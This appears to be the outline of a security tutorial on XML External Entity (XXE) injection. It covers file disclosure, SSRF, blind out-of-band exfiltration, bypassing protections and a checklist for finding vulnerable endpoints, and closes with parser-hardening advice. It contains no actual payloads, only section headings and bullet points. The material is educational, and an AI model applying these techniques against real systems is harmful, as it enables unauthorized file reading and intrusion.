XML: The Trojan Horse of Data Formats
XML was supposed to be a universal data exchange format. What could possibly go wrong with a language that lets you define your own tags? Well, it turns out XML has a feature called "external entities" that was designed for convenience but became one of the most dangerous vulnerability classes in web security.
XXE (XML External Entity) injection allows attackers to interfere with how an application processes XML data. At its mildest, you can read files from the server. At its worst, you get full server-side request forgery, port scanning, and even remote code execution.
SSRF
XML Basics for Hackers
Before we break XML, let's understand what makes it tick. XML has a feature called DTD (Document Type Definition) that defines the structure of the document - and allows external entities.
Basic XML Structure
Internal Entities (Safe-ish)
External Entities (Dangerous!)
Types of XXE Attacks
1. Classic XXE (File Disclosure)
2. XXE to SSRF
3. Blind XXE (Out-of-Band)
When the XML response doesn't include your entity value, you need to exfiltrate data through out-of-band channels:
4. Error-Based XXE
5. XInclude Attacks
When you can't control the DOCTYPE but can inject into XML content:
Finding XXE Vulnerabilities
XXE Hunting Process
- File uploads (DOCX, XLSX, SVG are XML-based!)
- API endpoints accepting XML
- SOAP web services
- RSS/Atom feed parsers
- Config file uploads
- Submit XML with a harmless internal entity
- If it expands, external entities might work too
- Try file:// protocol to read local files
- Try http:// to detect outbound connections
- If no direct output, use out-of-band detection
- Host an external DTD on your server
Hidden XML Entry Points
Exploitation Techniques
File Reading
SSRF via XXE
Blind XXE with External DTD
SVG XXE
XLSX/DOCX XXE
Bypassing XXE Protections
Encoding Bypasses
Protocol Alternatives
Parameter Entities When Regular Blocked
Practice Challenges
Knowledge Check
Key Takeaways
- XXE exploits XML's external entity feature to read files, make HTTP requests (SSRF), and more
- DTD section is the attack surface - look for <!DOCTYPE and <!ENTITY declarations
- Hidden XML formats: DOCX, XLSX, SVG, SOAP, RSS/Atom are all potential XXE vectors
- Blind XXE uses parameter entities and external DTDs to exfiltrate data out-of-band
- Defense: Disable DTD processing and external entities in your XML parser configuration